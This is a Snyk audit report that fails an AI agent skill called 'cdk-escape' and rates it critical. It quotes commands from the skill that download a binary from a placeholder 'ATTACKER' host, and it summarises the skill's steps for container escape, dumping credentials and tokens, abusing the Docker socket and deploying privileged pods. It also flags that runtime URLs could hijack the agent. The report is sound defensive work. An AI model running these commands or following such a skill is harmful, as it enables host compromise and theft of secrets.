Skills
skills/wgpsec/aboutsecurity/cdk-escape/Snyk

cdk-escape

Fail

Audited by Snyk on Apr 22, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). The skill explicitly instructs dumping sensitive items (K8s ServiceAccount tokens, /etc/shadow, cloud metadata, secrets/configmaps) and running commands that would expose those secret values, so an agent following it would likely need to capture and output secrets verbatim.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 0.95). These are suspicious: two URLs point to an attacker-controlled host (one using an ephemeral HTTP server on port 8000 and one HTTPS to a non‑verified "ATTACKER" host) that directly serve a binary, and the GitHub repo is unvetted in the context of an explicit container-escape skill—together they represent a high-risk, likely-malicious download source.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This skill explicitly instructs container escape, privilege escalation, credential/the token theft, remote code execution and backdoor deployment (e.g., downloading binaries from an "ATTACKER" server, abusing /var/run/docker.sock, exploiting CVEs, creating privileged DaemonSets and dumping K8s ServiceAccount tokens), indicating deliberate malicious intent and abuse.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). SKILL.md explicitly instructs fetching and executing a binary from arbitrary/untrusted URLs (e.g., "curl -o /tmp/cdk https://ATTACKER/cdk" and "wget http://ATTACKER:8000/cdk"), so the workflow ingests and runs third‑party content that can materially control subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill explicitly instructs fetching and executing a required CDK binary at runtime from external hosts (e.g., curl -o /tmp/cdk https://ATTACKER/cdk and wget http://ATTACKER:8000/cdk -O /tmp/cdk), so those URLs are used to deliver and run remote code.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs running container escape techniques, privilege-escalation exploits, deploying backdoor/privileged pods and using the Docker socket and kernel exploits—actions that modify and compromise the host/container state.

Issues (6)

W007
HIGH

Insecure credential handling detected in skill instructions.

E005
CRITICAL

Suspicious download URL detected in skill instructions.

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 22, 2026, 10:07 AM
Issues
6